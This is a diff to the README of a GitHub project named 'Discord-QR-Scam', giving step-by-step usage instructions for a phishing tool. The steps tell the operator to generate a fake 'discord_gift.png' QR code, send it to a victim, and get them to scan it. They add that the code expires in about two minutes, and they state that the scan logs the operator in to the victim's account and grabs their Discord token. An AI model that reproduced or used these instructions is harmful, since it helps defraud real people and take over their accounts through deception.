NightfallGT/Discord-QR-Scam/README.md

 4. Wait for the `discord_gift.png` to be generated.
 Send the image to the victim and make them scan it.

+5. QR Code only lasts about 2 minutes.
+Make sure you send a fresh one to the victim and he is ready to scan.

-5. When the QR Code is scanned, you will automatically be logged in to their account and the script will grab the Discord token.
+6. When the QR Code is scanned, you will automatically be logged in to their account and the script will grab the Discord token.

 ## Troubleshoot
 Make sure your chromedriver.exe file is the same version as your current Chrome web browser version.
 To check your current Chrome version,